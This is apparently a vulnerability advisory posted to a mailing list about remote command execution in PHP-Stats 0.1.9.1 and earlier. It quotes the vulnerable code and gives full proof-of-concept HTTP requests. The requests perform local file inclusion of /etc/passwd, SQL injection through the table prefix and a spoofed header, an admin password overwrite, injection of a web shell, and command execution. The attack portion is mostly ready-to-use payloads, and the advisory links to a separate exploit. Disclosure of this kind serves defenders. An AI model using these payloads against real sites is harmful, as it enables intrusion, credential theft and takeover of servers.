<<< Date Index >>>     <<< Thread Index >>>

PHP-Stats <= 0.1.9.1 remote commands execution



------------- PHP-Stats <= 0.1.9.1 remote commands execution -------------------

software:
site: http://www.phpstats.net/
description: Open source statistical package for PHP enabled web sites
--------------------------------------------------------------------------------
i) vulnerable code in admin.php (and in nearly every scripts...) at line 65:

...
if(isset($_POST['option'])) { while (list ($key, $value) = each ($tmpOption)) 
$option[$key]=$value; }
...

you can overwrite at run-time the "option[]" array...,
raising SQL injection, arbitrary local inclusion and php injection issues, poc:

i.a) arbitrary local inclusion (with magic_quotes_gpc off):

i.a1)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[clear_cache]=1&option[language]=../../../../../../etc/passwd[null
 char]

i.a2)
POST [path]admin.php?do=0 HTTP/1.1\r\n";
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[template]=../../../../../../etc/passwd[null char]

i.b) SQL injection - you can inject arbitrary SQL commands through the table
prefix, regardless of magic_quotes_gpc settings:

POST [path]admin.php?do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[prefix]=[SQL]

i.c) PHP code injection - you can grant administrative privileges, overwriting
"option[admin_pass]" value and building a MD5 admin cookie on new value.
Now you can inject a shell in two different ways by administrative features,
poc:

i.c1)
POST [path]admin.php?action=esclusioni&opzioni=excfol HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Cookie: php_stats_cache=1; pass_cookie=[md5 hash of "suntzu"]
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[admin_pass]=suntzu&option_new=[SHELL]

now you can launch commands including option/php-stats-options.php script,poc:

POST [path]admin.php?cmd=netstat%20-ano&do=0 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: [somehost]
Content-Length: [data_length]
Connection: Close

option=&option[language]=../option/php-stats-options.php[null char]

i.c2) the most chritical, this works regardless of any php.ini settings, you
can inject a shell in config.php and launch commands from it.
Poc exploit here:

http://retrogod.altervista.org/php_stats_0191_xpl.html

--------------------------------------------------------------------------------
ii) vulnerable code in click.php at line 18:

...
 if(isset($_SERVER['REMOTE_ADDR'])) $ip=(isset($_SERVER['HTTP_PC_REMOTE_ADDR']) 
? $_SERVER['HTTP_PC_REMOTE_ADDR'] : $_SERVER['REMOTE_ADDR']);
...

and line 65:

...
$result=sql_query("SELECT visitor_id FROM $option[prefix]_cache WHERE 
user_id='$ip' LIMIT 1");
...

you can inject sql commands through PC_REMOTE_ADDR http header, poc:

GET [path]click.php?id=1&get=1 HTTP/1.1
PC_REMOTE_ADDR: 'UNION SELECT '[code]'INTO OUTFILE 'shell.php' FROM 
php_stats_cache/*
Host: [host]
Connection: Close

--------------------------------------------------------------------------------
iii) information disclosure, you can go to:

http://[target]/[path]/checktables.php

to see at screen database table_prefix, making easier the exploitation 
process...

--------------------------------------------------------------------------------
rgod

site: http://retrogod.altervista.org
mail: rgod at autistici.org
original advisory: http://retrogod.altervista.org/php_stats_0191_adv.html
--------------------------------------------------------------------------------